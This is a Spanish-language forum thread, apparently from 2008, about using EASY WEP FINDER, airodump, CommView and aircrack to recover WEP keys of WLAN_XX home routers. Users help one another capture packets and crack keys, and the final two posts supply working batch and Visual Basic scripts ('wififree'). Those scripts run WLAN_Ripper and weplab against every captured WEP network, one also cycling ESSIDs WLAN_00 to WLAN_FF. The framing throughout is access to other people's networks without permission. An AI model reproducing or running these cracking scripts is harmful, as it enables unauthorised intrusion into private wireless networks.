 Autor
|
Tema: Claves WEP en 15 minutos o menos? EASY WEP FINDER v1.3b te lo pone fácil..... (Leído 300957 veces)
|
|
KARR
|
Buenas.
Me presento: aunque llevo ya meses entrando al foro me he decidido a registrarme para poder entrar de forma más directa en el foro. Lo primero dar las gracias a MADMAX23 por todo el esfuerzo volcado. Una vez dicho esto paso a comentar mi duda:
Me bajé Airodump, (ya que la(s) red(es) que capto son del tipo WLAN_XX) el que indica en la web de EWF. Antes de comenzar el proceso me da un error:
"FATAL: failed to set the wireless channel, is something wrong with the card? Also make sure you have installed the correct driver."
El modelo de tarjeta que tengo es una Conceptronic 54g PCI que, por lo visto, el chipset que lleva es Ralink RT2500. Pues bien entro a la web de Conceptronic y me bajo drivers más nuevos que los que venían en el CD con la tarjeta. Lo intento de nuevo con el Airodump y nada, el mismo error justo al ir a empezar el proceso.
Si alguien ha tenido el mismo problema, o sabe como podría solucionarlo agradecería que posteara, ya que al meter los nuevos drivers no se me soluciona el problema (la tarjeta capta mejor las señales, pero nada más).
Saludos y gracias de antemano
Yo tengo una tarjeta desas . conceptronic c54ri , como tu dices ews una ralink , si miras algo por el foro ninguna ralink funciona en windows para auditoría , así que tendrás que usar linux , te recomiendo wifislax , si quieres usar el easy web finder puedes hacerlo igual , gualdas las cpturas y despues las usas en windows con el easy web finder  Un saludo  |
|
|
|
|
En línea
|
|
|
|
Probador2008
 Desconectado
Mensajes: 2
|
Bueno pues ya tengo algunas cosas mas claras...
Ya tengo una tarjeta con chip atheros, ya he usado netslumber y conozco las ESSID de mis maquina a comprobar, tambien sus MAC y he podido poner la tarjeta en modo monitor usando el comview for windows... pero tengo una duda...
La version de evaluacion de comview me dice que solo captura la mitad de los paquetes, es suficiente para poder el archivo CAP mas tarde?? o debo buscar la version FULL...
Por otra parte he creado una regla avanzada tal y como se explica en el tutorial para que me capture solo trafico de una determinada MAC, ¿es correcto o debo capturar todos los AP que tenga a mano?
No tengo ni idea de como decirle que me capture los datos... veo todos los AP como se especifica en el tutorial pero en ningun momento me dice que se acabo la captura ni me pregunta para guardar el fichero ni se nada de lo que axplica el tutorial de anexionar los ficheros de captura , etc..
Hay tanto manual y tanto texto que llega un momento en el que no ves mdad, a ver si alguien me puede sacar de dudas...
Gracias..
|
|
|
|
|
En línea
|
|
|
|
EtXeBe-X
Desconectado
Mensajes: 44
Gazte, topau giñen...
|
He obtenido en eso de 30 minutos 16 datas con el aerodump y mi tarjeta en modo monitos con chipset atheros. La red casi tenia intensidad nula.
Con esas datas obtenidas he llevado a cabo el EASY WEP FINDER y wala!!
La key en menos de un segundo desencriptada!!
Un saludo, y gracias pueblicar por semejante herramienta!!
|
|
|
|
|
En línea
|
|
|
|
ann_secu
Desconectado
Mensajes: 28
|
Buenas,
En este post se adjuntan un par de imagenes.
Tengo una tarjeta chipset atheros pero no consigo hacer funcionar el airodump. Que es lo que falla?
http://www.youimg.net/uploads/6e0108c8c0.jpg
http://www.youimg.net/uploads/82e7c6d5e5.jpg
Posiblemente lo que te falla es el driver , tienes que instalar un driver especial para poder poner la tarjeta en modo monitor en windows
Un saludo Cool CoolDonde se puede obtener dicho driver? Gracias i saludos
|
|
|
|
|
En línea
|
|
|
|
|
|
|
MADMAX23
|
Bueno, ayer a la noche llegué de las vacatas...y para mí sorpresa, visito hoy el foro..y ya no está el tema como PostIt cuando sigue siendo el tema más visitado a diario...yo no lo entiendo...y vosotros? en fin...qué se le va a hacer....
nitsuga78: Sí, al poner en modo monitor un adaptador wifi para capturar paquetes, se pierde la conexion a Internet, es normal y lógico.
Probador2008: Con la versión de evaluación del Commview tienes más que suficiente para capturar paquetes. En cuanto a los manuales, sí, hay mucha info, de ti depende el seleccionar partes de esa info y centrarte en ellos...
EtXeBe-X: Me alegro de que te haya sido de utilidad!! Eskerrik asko mutil!!
ZayDun: Si no me equivoco (me gusta ser prudente) las redes con ESSID LiveBox-xxxx de Orange llevan claves WPA por defecto...así que...por ahora..mejor olvídate de ellas...
Uru: Supongo que te refieres a redes wifi con un ESSID personalizado....es normal que no averigües la clave WEP de la mayoría de las redes con ESSID personalizado usando el EWF, ya que el apartado PERSONAL del EWF está pensado sólo para los casos en los que los usuarios generen la clave WEP a partir del nombre de su ESSID personal. CLAVE WEP = algoritmoOficial( ESSID PERSONAL )
skunki: Lamento decirte que tu tarjeta con chipset RT2500 o RT61 sólo puede ponerse en modo monitor bajo Linux, no en Windows, así que ya sabes, bájate WifiSlax o WifiWay para esnifar paquetes. Luego puedes coger el archivo .cap y utilizar el EWF en Windows. Suerte!!
Bueno, a ver si termino el EWF como se merece...en breve lo haré...demasiado curro y fiestas ultimamente...pero lo terminaré.
Tengo pensado crear una web dedicada exclusivamente al mismo, con un manual para quitar el hipo...ya os iré informando.
Gracias a todos los que me escribis a diario felicitándome, plateándome cuestiones y sugerencias, sin vosotros el EWF no hubiera sido posible!!
Saludos
|
|
|
|
|
En línea
|
|
|
|
primiape
Desconectado
Mensajes: 2
|
Hola bueno veo por aqui algo sobre esta Mac , intento saber que modelo de router es ,, 01:1A:2B:69:CC:2E .
Si podeis informarme ,, muchas gracias ya q no consigo localizar el modelo ...
Cuando entro por telnet me dice ..
bcm96348 adsl router.
hay alguna manera de localizar el router , con airoscrip o algo parecido ,,,
|
|
|
|
« Última modificación: 28 Marzo 2008, 17:23 por primiape »
|
En línea
|
|
|
|
juegazos2000
Desconectado
Mensajes: 1
|
Muy buenas
mira es la primera vez que entro en la pagina pero ya me e leido oy mil posts
el problema es que quiero conectarme a una WLAN_07 con el wlan_ripper, que segun e leido funciona mu bien, pero ya en el segundo paso ya me pierdo.
con el airodump me dice que introduzca el network interfaxe index number, escribo lo que encuentro en los foros y no hace caso, es como si no pasara nada, y entonces no se generar el archivo.cap.
lo mejor a utilizar en este caso es el airodump con el wlan_ripper? en caso de que no podriais decirme que utilizar para este caso?
muchas gracias y si alguno seria tan amable de guiarme personalmente por medio de e-mail se lo agradeceria, eske no soy mu experto en la materia
|
|
|
|
|
En línea
|
|
|
|
PepitoGrillorr
Desconectado
Mensajes: 22
|
Hola, es la primera vez que uso EWf. El caso esque tengo un .cap de uns 130.000 o 150.000 ivs obtenido con linux mediante un A1+A3. El aircrack-ptw no me ha dado la clave wep. El EWF me ha dado una clave no válida. La red es del tipo WLAN_XX y MAC 00:19:15:XX:XX:XX.
|
|
|
|
|
En línea
|
|
|
|
|
KARR
|
¿En que te basas para decir que la clave no es válida? Aver si vas tener DHCP desabilitado  Un saludo |
|
|
|
|
En línea
|
|
|
|
PepitoGrillorr
Desconectado
Mensajes: 22
|
Me dice que la clave introducida no es valida y aparece nuevamente el campo para introducir de nuevo un clave.
|
|
|
|
|
En línea
|
|
|
|
m.k.
Desconectado
Mensajes: 39
|
Puede ser que hayan cambiado la clave por defecto del router.
Yo seguiria capturando paquetes y despues la intentaria sacar con aircrack.
Salu2
|
|
|
|
|
En línea
|
El conocimiento es poder. No malgastes ni un sólo día: aprende, aprende, aprende... (Lucifer48)
|
|
|
|
KARR
|
Me dice que la clave introducida no es valida y aparece nuevamente el campo para introducir de nuevo un clave.
Yo creo que pone que la longitud de la clave introduciada no es válida , si es la hexadecimal la que estás usando , metela sin puntos , y fijate bien haber si no te has equivocado al introducirla , porque si no fuese correcta la clave , conectarias , pero te pondríalo de conectividad limitada o nula Un saludo |
|
|
|
|
En línea
|
|
|
|
wyxchari
Desconectado
Mensajes: 3
|
Como es muy pesado ir probando con el Ripper y weplab todas las MACs y ESSID una a una copiando y pegando, he hecho un programa en Visual Basic con 2 label y 2 ficheros externos que deben correrse en la carpeta de Ripper y weplab:
Archivo wf.bat:
@echo off
echo .
echo -------------------------------------------------------------------------------- %1 %2
Ripper %1 %2 captura-01.cap
type chorizo | weplab -y --wordfile claves.txt --key 128 --bssid %1 captura-01.cap
Archivo chorizo:
Sin nada dentro. Archivo de longitud 0. Es para hacerle type hacia weplab para que éste no se pare al final esperando que se pulse enter.
Archivo wififree.bas:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Dim cadena$, c2$, c3$, c4$, c5$, c6$, c7$, c8$, c9$, c10$, c11$, c12$, c13$, c14$
Private Sub Form_Activate()
q = "salida.txt"
If Dir(q) = q Then Kill q
Label1.Caption = "Prueba las WLAN_XX sobre las WEPs" + Chr(13)
Label1.Caption = Label1.Caption + "Entrada: captura-01.txt y captura-01.cap. Salida: salida.txt" + Chr(13)
Label1.Caption = Label1.Caption + "Al terminar en salida.txt se busca: found" + Chr(13)
Open "captura-01.txt" For Input As #1
otro:
DoEvents
Input #1, cadena
If cadena = "Station MAC" Then Close #1: Label2.Caption = "Terminado captura-01.txt": GoTo sale
If Len(cadena) <> 17 Or Mid$(cadena, 3, 1) <> ":" Then GoTo otro
Input #1, c2$, c3$, c4$, c5$, c6$, c7$, c8$, c9$, c10$, c11$, c12$, c13$, c14$
If c11$ = "0" Then GoTo otro ' Descarta MACs sin Data ó IV
If c7$ <> "WEP" Then GoTo otro ' Descarta MACs OPEN ó WPA
If Left(c14$, 5) <> "WLAN_" Or Len(c14$) <> 7 Then GoTo otro ' Descarta no WLAN_XX
Label2.Caption = cadena & " " & c14$
Shell "wf.bat " & cadena & " " & c14$ & ">>salida.txt", 1
For q = 1 To 100: DoEvents: Next q
otro2:
DoEvents
If FindWindow(vbNullString, "c:\windows\system32\cmd.exe") <> 0 Then GoTo otro2
GoTo otro
sale:
End Sub
|
|
|
|
« Última modificación: 06 Abril 2008, 10:38 por wyxchari »
|
En línea
|
|
|
|
wyxchari
Desconectado
Mensajes: 3
|
Para forzar el ESSID desde WLAN_00 a WLAN_FF por si lo han cambiado uso este otro:
Archivo wf.bat: Igual que el anterior.
Archivo chorizo: Igual que el anterior.
Archivo wififree2.bas:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Dim cadena$, c2$, c3$, c4$, c5$, c6$, c7$, c8$, c9$, c10$, c11$, c12$, c13$, c14$
Private Sub Form_Activate()
q = "salida.txt"
If Dir(q) = q Then Kill q
Label1.Caption = "Prueba WLAN_00 a WLAN_FF por si le han cambiado el nombre de red." + Chr(13)
Label1.Caption = Label1.Caption + "Entrada: captura-01.txt y captura-01.cap. Salida: salida.txt" + Chr(13)
Label1.Caption = Label1.Caption + "Al terminar en salida.txt se busca: found" + Chr(13)
Open "captura-01.txt" For Input As #1
otro:
DoEvents
Input #1, cadena
If cadena = "Station MAC" Then Close #1: Label2.Caption = "Terminado captura-01.txt": GoTo sale
If Len(cadena) <> 17 Or Mid$(cadena, 3, 1) <> ":" Then GoTo otro
Input #1, c2$, c3$, c4$, c5$, c6$, c7$, c8$, c9$, c10$, c11$, c12$, c13$, c14$
If c11$ = "0" Then GoTo otro ' Descarta MACs sin Data ó IV
If c7$ <> "WEP" Then GoTo otro ' Descarta MACs OPEN ó WPA
f = 0
otro3:
q = Hex(f): If Len(q) = 1 Then q = "0" & q
q = " WLAN_" & q
Label2.Caption = cadena & " " & c14$ & q
Shell "wf.bat " & cadena & q & ">>salida.txt", 1
For q = 1 To 100: DoEvents: Next q
otro2:
DoEvents
If FindWindow(vbNullString, "c:\windows\system32\cmd.exe") <> 0 Then GoTo otro2
f = f + 1
If f <= &HFF Then GoTo otro3
GoTo otro
sale:
End Sub
|
|
|
|
« Última modificación: 06 Abril 2008, 10:14 por wyxchari »
|
En línea
|
|
|
|
|
 |
